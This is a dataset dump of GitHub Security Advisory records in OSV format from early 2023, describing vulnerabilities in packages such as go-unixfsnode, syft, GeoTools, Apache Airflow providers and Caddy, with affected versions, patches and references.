schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 20
140
| details
stringlengths 56
37.2k
| severity
stringlengths 2
92
| affected
stringlengths 88
7.07k
| references
stringlengths 139
4.72k
| database_specific
stringlengths 131
185
|
|---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0
|
GHSA-4gj3-6r43-3wfc
|
2023-02-17T20:32:08Z
|
2023-02-10T19:54:14Z
| null |
['CVE-2023-23631']
|
IPFS go-unixfsnode subject to DOS via HAMT Decoding Panics
|
## Impact
Trying to read malformed HAMT sharded directories can cause panics and virtual memory leaks.
If you are reading untrusted user input, an attacker can then trigger a panic.
This is caused by a bogus fanout parameter in the HAMT directory nodes.
This includes checks returned in [ipfs/go-bitfield GHSA-2h6c-j3gf-xp9r](https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r), as well as limiting the fanout to <= 1024 (to avoid attempts of arbitrary sized allocations).
## Patches
- https://github.com/ipfs/go-unixfsnode/commit/91b3d39d33ef0cd2aff2c95d50b2329350944b68
- https://github.com/ipfs/go-unixfsnode/commit/a4ed723727e0bdc2277158337c2fc0d82802d122
## References
* https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778
* https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-unixfsnode'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/security/advisories/GHSA-4gj3-6r43-3wfc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23631'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/59050ea8bc458ae55246ae09243e6e165923e076'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/91b3d39d33ef0cd2aff2c95d50b2329350944b68'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfsnode/commit/a4ed723727e0bdc2277158337c2fc0d82802d122'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/go-unixfsnode'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1559'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T19:54:14Z', 'nvd_published_at': '2023-02-09T21:15:00Z'}
|
1.4.0
|
GHSA-9xm8-8qvc-vw3p
|
2023-02-07T22:41:28Z
|
2023-02-07T22:41:28Z
| null |
['CVE-2020-29242']
|
Denial of Service in dhowden/tag
|
dhowden tag before 0.0.0-20201120070457-d52dcb253c63 allows `panic: runtime error: index out of range` via readPICFrame.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/dhowden/tag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20201120070457-d52dcb253c63'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29242'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/77'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/78'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/79'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/80'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/4b595ed4fac79f467594aa92f8953f90f817116e'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/6b18201aa5c5535511802ddfb4e4117686b4866d'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/a92213460e4838490ce3066ef11dc823cdc1740e'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/d52dcb253c63a153632bfee5f269dd411dcd8e96'}, {'type': 'PACKAGE', 'url': 'https://github.com/dhowden/tag'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0097'}]
|
{'cwe_ids': ['CWE-129'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:41:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6p89-3p7c-qrhv
|
2023-02-23T21:52:54Z
|
2023-02-13T21:31:04Z
|
2023-02-15T15:36:00Z
|
['CVE-2022-48110']
|
Cross-site scripting in CKEditor5
|
CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Full Featured CKEditor5 widget.
NOTE: the vendor's position is that this is not a vulnerability. The CKEditor 5 documentation discusses that it is the responsibility of an integrator (who is adding CKEditor 5 functionality to a website) to choose the correct security settings for their use case. Also, safe default values are established (e.g., config.htmlEmbed.showPreviews is false).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'ckeditor5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '36.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48110'}, {'type': 'WEB', 'url': 'https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor5'}, {'type': 'WEB', 'url': 'https://packetstormsecurity.com/files/170927/CKSource-CKEditor5-35.4.0-Cross-Site-Scripting.html'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:29:24Z', 'nvd_published_at': '2023-02-13T20:15:00Z'}
|
1.4.0
|
GHSA-jp7v-3587-2956
|
2023-02-08T21:38:46Z
|
2023-02-08T21:38:46Z
| null |
['CVE-2023-24827']
|
Credential disclosure in syft when SYFT_ATTEST_PASSWORD environment variable set
|
A password disclosure flaw was found in Syft versions v0.69.0 and v0.69.1. This flaw leaks the password stored in the SYFT_ATTEST_PASSWORD environment variable.
### Impact
The `SYFT_ATTEST_PASSWORD` environment variable is for the `syft attest` command to generate attested SBOMs for the given container image. This environment variable is used to decrypt the private key (provided with `syft attest --key <path-to-key-file>`) during the signing process while generating an SBOM attestation.
This vulnerability affects users running syft that have the `SYFT_ATTEST_PASSWORD` environment variable set with credentials (regardless of if the attest command is being used or not). Users that do not have the environment variable `SYFT_ATTEST_PASSWORD` set are not affected by this issue.
The credentials are leaked in two ways:
- in the syft logs when `-vv` or `-vvv` are used in the syft command (which is any log level >= `DEBUG`)
- in the attestation or SBOM only when the `syft-json` format is used
Note that as of v0.69.0 any generated attestations by the `syft attest` command are uploaded to the OCI registry (if you have write access to that registry) in the same way `cosign attach` is done. This means that any attestations generated for the affected versions of syft when the `SYFT_ATTEST_PASSWORD` environment variable was set would leak credentials in the attestation payload uploaded to the OCI registry.
Example commands run from affected versions of syft that show the credential disclosure:
```bash
$ SYFT_ATTEST_PASSWORD=123456 syft <container-image-or-directory-input> -o syft-json | grep 123456
# "123456" is in the output
$ SYFT_ATTEST_PASSWORD=123456 syft attest <container-image-input> -o syft-json
$ cosign download attestation <container-image-input> | jq -r '.payload' | base64 -d | grep 123456
# "123456" is in the output
```
### Patches
The patch has been released in v0.70.0.
### Workarounds
There are no workarounds for this vulnerability.
### References
Patch pull request: https://github.com/anchore/syft/pull/1538
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/anchore/syft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.69.0'}, {'fixed': '0.70.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/anchore/syft/security/advisories/GHSA-jp7v-3587-2956'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24827'}, {'type': 'WEB', 'url': 'https://github.com/anchore/syft/commit/9995950c70e849f9921919faffbfcf46401f71f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/anchore/syft'}]
|
{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:38:46Z', 'nvd_published_at': '2023-02-07T01:15:00Z'}
|
1.4.0
|
GHSA-33m6-q9v5-62r7
|
2023-02-07T22:57:53Z
|
2023-02-07T22:57:53Z
| null |
['CVE-2021-3538']
|
github.com/satori/go.uuid has Predictable SIF UUID Identifiers
|
### Impact
The siftool new command produces predictable UUID identifiers due to insecure randomness in the version of the `github.com/satori/go.uuid` module used as a dependency.
### Patches
A patch is available in version >= v1.2.1-0.20180404165556-75cca531ea76 of the module. Users are encouraged to upgrade.
Fixed by https://github.com/hpcng/sif/pull/90
### Workarounds
Users passing CreateInfo struct should ensure the ID field is generated using a version of github.com/satori/go.uuid that is not vulnerable to this issue. Unfortunately, the latest tagged release is vulnerable to this issue. One way to obtain a non-vulnerable version is:
`go get -u github.com/satori/go.uuid@v1.2.1-0.20180404165556-75cca531ea76`
### References
https://github.com/satori/go.uuid/issues/73
### For more information
If you have any questions or comments about this advisory:
Open an issue in https://github.com/hpcng/sif/issues
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/satori/go.uuid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.1-0.20180103161547-0ef6afb2f6cd'}, {'fixed': '1.2.1-0.20180404165556-75cca531ea76'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/apptainer/sif/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.1-0.20180103161547-0ef6afb2f6cd'}, {'fixed': '1.2.1-0.20180404165556-75cca531ea76'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/hpcng/sif/security/advisories/GHSA-33m6-q9v5-62r7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3538'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/issues/73'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/pull/75'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/commit/75cca531ea763666bc46e531da3b4c3b95f64557'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1954376'}, {'type': 'PACKAGE', 'url': 'https://github.com/satori/go.uuid'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0244'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSATORIGOUUID-72488'}]
|
{'cwe_ids': ['CWE-338'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:57:53Z', 'nvd_published_at': '2021-06-02T14:15:00Z'}
|
1.4.0
|
GHSA-m22q-97p5-79v2
|
2023-02-22T00:11:36Z
|
2023-02-21T00:30:20Z
| null |
['CVE-2021-32851']
|
Mind-elixir Cross-site Scripting vulnerability
|
Mind-elixir is a free, open source mind map core. Prior to version 0.18.1, mind-elixir is prone to cross-site scripting when handling untrusted menus. This issue is patched in version 0.18.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'mind-elixir'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32851'}, {'type': 'WEB', 'url': 'https://github.com/ssshooter/mind-elixir-core/commit/073485269ac83af24371f35bd08507defa885655'}, {'type': 'PACKAGE', 'url': 'https://github.com/ssshooter/mind-elixir-core'}, {'type': 'WEB', 'url': 'https://github.com/ssshooter/mind-elixir-core/blob/79942a68b14c8875ab7d270b1ad25bfff351b04c/src/plugin/contextMenu.js#L13'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1047_Mind-elixir/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:11:36Z', 'nvd_published_at': '2023-02-20T22:15:00Z'}
|
1.4.0
|
GHSA-6pm2-j2v8-h3cj
|
2023-02-15T17:39:56Z
|
2023-02-06T21:30:29Z
|
2023-02-09T22:03:51Z
|
['CVE-2023-0669']
|
Withdrawn: Fortra GoAnywhere MFT Deserialization of Untrusted Data vulnerability affects metasploit-framework
|
## Withdrawn
This advisory has been withdrawn because it was incorrectly associated with the metasploit-framework package, which is not affected by this CVE, and the actual vulnerable component does not fit within our supported ecosystems. This link is maintained to preserve external references.
## Original Description
Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'metasploit-framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.33'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0669'}, {'type': 'WEB', 'url': 'https://github.com/rapid7/metasploit-framework/pull/17607'}, {'type': 'WEB', 'url': 'https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis'}, {'type': 'WEB', 'url': 'https://duo.com/decipher/fortra-patches-actively-exploited-zero-day-in-goanywhere-mft'}, {'type': 'WEB', 'url': 'https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/rapid7/metasploit-framework'}, {'type': 'WEB', 'url': 'https://infosec.exchange/@briankrebs/109795710941843934'}, {'type': 'WEB', 'url': 'https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1'}, {'type': 'WEB', 'url': 'https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:39:43Z', 'nvd_published_at': '2023-02-06T20:15:00Z'}
|
1.4.0
|
GHSA-vvjv-97j8-94xh
|
2023-03-10T18:34:20Z
|
2023-02-28T23:19:24Z
| null |
['CVE-2023-22738']
|
vantage6 vulnerable to Improper Preservation of Permissions
|
### Impact
Assigning existing users to a different organization is currently possible. It may lead to unintended access: if a user from organization A is accidentally assigned to organization B, they will retain their permissions and therefore might be able to access stuff they should not be allowed to access.
### Patches
Update to 3.8.0
### Workarounds
None
### References
None
### For more information
If you have any questions or comments about this advisory:
* Email us at [vantage6@iknl.nl](mailto:vantage6@iknl.nl)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'vantage6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/security/advisories/GHSA-vvjv-97j8-94xh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22738'}, {'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/commit/798aca1de142a4eca175ef51112e2235642f4f24'}, {'type': 'PACKAGE', 'url': 'https://github.com/vantage6/vantage6'}]
|
{'cwe_ids': ['CWE-281'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:19:24Z', 'nvd_published_at': '2023-03-01T21:15:00Z'}
|
1.4.0
|
GHSA-99c3-qc2q-p94m
|
2023-02-22T19:16:06Z
|
2023-02-22T19:16:06Z
| null |
['CVE-2023-25158']
|
GeoTools OGC Filter SQL Injection Vulnerabilities
|
### Impact
GeoTools includes support for OGC Filter expression language parsing, encoding and execution against a range of datastore.
SQL Injection Vulnerabilities have been found when executing OGC Filters with JDBCDataStore implementations:
1. ``PropertyIsLike`` filter
* Requires PostGIS DataStore with "encode functions" enabled
* Or any JDBCDataStore (all relational databases) with String field (no mitigation)
3. ``strEndsWith`` function
* Requires PostGIS DataStore with "encode functions" enabled
5. ``strStartsWith`` function
* Requires PostGIS DataStore with "encode functions" enabled
6. ``FeatureId`` filter
* Requires JDBCDataStore (all relational databases) with prepared statements disabled and table with String primary key (Oracle not affected, SQL Server and MySQL have no settings to enabled prepared statements, PostGIS does)
7. ``jsonArrayContains`` function
* Requires PostGIS and Oracle DataStore with String or JSON field
8. ``DWithin`` filter
* Happens only in Oracle DataStore, no mitigation
### Patches
* GeoTools 28.2
* GeoTools 27.4
* GeoTools 26.7
* GeoTools 25.7
* GeoTools 24.7
### Workarounds
Partial mitigation:
* In PostGIS DataStore disable "encode functions"
* In any PostGIS enable "prepared statements" (only database with such settings)
```java
Map<String, Object> params = new HashMap<>();
params.put("dbtype", "postgis");
params.put("host", "localhost");
params.put("port", 5432);
params.put("schema", "public");
params.put("database", "database");
params.put("user", "postgres");
params.put("passwd", "postgres");
params.put("preparedStatements", true ); // mitigation
params.put("encode functions", false ); // mitigation
DataStore dataStore = DataStoreFinder.getDataStore(params);
```
### References
* [OGC Filter SQL Injection Vulnerabilities](https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf) (GeoServer)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '28.0'}, {'fixed': '28.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '27.0'}, {'fixed': '27.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '26.0'}, {'fixed': '26.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '25.0'}, {'fixed': '25.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '24.7'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/geotools/geotools/security/advisories/GHSA-99c3-qc2q-p94m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25158'}, {'type': 'WEB', 'url': 'https://github.com/geotools/geotools/commit/64fb4c47f43ca818c2fe96a94651bff1b3b3ed2b'}, {'type': 'PACKAGE', 'url': 'https://github.com/geotools/geotools'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:06Z', 'nvd_published_at': '2023-02-21T21:15:00Z'}
|
1.4.0
|
GHSA-9mwf-mw74-9cv5
|
2023-03-06T19:37:46Z
|
2023-02-24T12:31:20Z
| null |
['CVE-2023-25696']
|
Apache Airflow Hive Provider Improper Input Validation vulnerability
|
Improper Input Validation vulnerability in the Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider versions before 5.1.3.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-hive'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25696'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29502'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/99g0qm56wmgdxmbtdsvhj4rdnxhpzpml'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:28Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}
|
1.4.0
|
GHSA-jpxj-2jvg-6jv9
|
2023-02-16T23:34:17Z
|
2023-02-16T21:30:28Z
| null |
['CVE-2023-0475']
|
Data Amplification in HashiCorp go-getter
|
HashiCorp go-getter up to 1.6.2 and 2.1.1 is vulnerable to decompression bombs. Fixed in 1.7.0 and 2.2.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/go-getter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/go-getter/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0475'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-getter/commit/0edab85348271c843782993345b07b1ac98912e6'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-getter/commit/78e6721a2a76266718dc92c3c03c1571dffdefdc'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-4-go-getter-vulnerable-to-denial-of-service-via-malicious-compressed-archive/50125'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/go-getter'}]
|
{'cwe_ids': ['CWE-409'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T23:34:17Z', 'nvd_published_at': '2023-02-16T19:15:00Z'}
|
1.4.0
|
GHSA-8g23-2q5p-8866
|
2023-03-06T21:57:35Z
|
2023-02-24T12:31:20Z
| null |
['CVE-2023-25691']
|
Apache Airflow Google Provider Improper Input Validation vulnerability
|
Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-google'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.10.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25691'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29497'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/zdr8ovfttbh7kj0lydgcw88tbt2nmkcy'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:46Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}
|
1.4.0
|
GHSA-66p8-j459-rq63
|
2023-02-10T23:11:01Z
|
2023-02-10T23:11:01Z
| null |
['CVE-2023-25168']
|
Pterodactyl Wings contains UNIX Symbolic Link (Symlink) Following resulting in deletion of files and directories on the host system
|
### Impact
This vulnerability impacts anyone running the affected versions of Wings. The vulnerability can be used to delete files and directories recursively on the host system. This vulnerability can be combined with [`GHSA-p8r3-83r8-jwj5`](https://github.com/pterodactyl/wings/security/advisories/GHSA-p8r3-83r8-jwj5) to overwrite files on the host system.
In order to use this exploit, an attacker must have an existing "server" allocated and controlled by Wings. Information on how the exploitation of this vulnerability works will be released on February 24th, 2023 in North America.
### Patches
This vulnerability has been resolved in version `v1.11.4` of Wings, and has been back-ported to the 1.7 release series in `v1.7.4`.
Anyone running `v1.11.x` should upgrade to `v1.11.4` and anyone running `v1.7.x` should upgrade to `v1.7.4`.
### Workarounds
None at this time.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-66p8-j459-rq63'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-p8r3-83r8-jwj5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25168'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/commit/429ac62dba22997a278bc709df5ac00a5a25d83d'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/wings'}]
|
{'cwe_ids': ['CWE-59'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T23:11:01Z', 'nvd_published_at': '2023-02-09T00:16:00Z'}
|
1.4.0
|
GHSA-qpm3-vr34-h8w8
|
2023-02-16T21:55:13Z
|
2023-02-07T00:30:24Z
| null |
['CVE-2022-28923']
|
Open Redirect in Caddy
|
Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/caddyserver/caddy/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0-beta.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-28923'}, {'type': 'WEB', 'url': 'https://github.com/caddyserver/caddy/commit/78b5356f2b1945a90de1ef7f2c7669d82098edbd'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-qpm3-vr34-h8w8'}, {'type': 'PACKAGE', 'url': 'https://github.com/caddyserver/caddy'}, {'type': 'WEB', 'url': 'https://lednerb.de/en/publications/responsible-disclosure/caddy-open-redirect-vulnerability/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1567'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:35:34Z', 'nvd_published_at': '2023-02-06T23:15:00Z'}
|
1.4.0
|
GHSA-w695-p3j5-hrj9
|
2023-03-06T19:38:25Z
|
2023-02-24T12:31:20Z
| null |
['CVE-2023-25956']
|
Apache Airflow AWS Provider Generates Error Message Containing Sensitive Information
|
Generation of Error Message Containing Sensitive Information vulnerability in the Apache Airflow AWS Provider. This issue affects Apache Airflow AWS Provider versions before 7.2.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-amazon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25956'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29587'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/07pl9y4gdpw2c6rzqm77dvkm2z2kb5gv'}]
|
{'cwe_ids': ['CWE-209'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:24:59Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}
|
1.4.0
|
GHSA-9fqc-9cpr-w73q
|
2023-02-10T22:06:31Z
|
2023-02-04T03:30:25Z
| null |
['CVE-2023-0671']
|
froxlor is vulnerable to privilege escalation from customer to root via directory-options
|
Code Injection in GitHub repository froxlor/froxlor prior to 2.0.10.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.10'}]}]}]
